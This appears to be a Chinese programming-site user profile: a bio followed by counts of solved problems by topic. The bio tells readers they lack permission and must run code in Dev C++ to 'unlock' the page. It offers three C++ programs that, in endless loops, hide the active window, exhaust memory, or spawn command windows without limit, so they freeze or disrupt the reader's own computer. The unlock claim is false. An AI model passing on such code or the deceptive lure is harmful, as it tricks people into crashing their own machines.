-
个人简介
Oops! 你没有该权限 请在Dev C++运行以解锁: #include<bits/stdc++.h> #include<windows.h> using namespace std; int main(){ while(1){ HWND hWnd=GetForegroundWindow(); ShowWindow(hWnd,SW_HIDE);} } 或 #include<bits/stdc++.h> using namespace std; int main(){ while(1) malloc(1000); } 或 #include<bits/stdc++.h> #include<windows.h> using namespace std; int main(){ while(1){ system("start cmd"); } }
-
通过的题目
题目标签
- 语言基础
- 65
- 一维数组
- 26
- 其他
- 25
- 循环语句
- 25
- 字符串
- 19
- 二维数组
- 18
- 字符数组
- 18
- NOIP
- 12
- 竞赛
- 12
- 贪心
- 11
- 递归
- 10
- 排序
- 9
- 搜索
- 9
- 二分
- 7
- 高精度
- 7
- 普及组
- 7
- 二分查找
- 7
- 数据结构
- 6
- 递推
- 5
- 位运算
- 4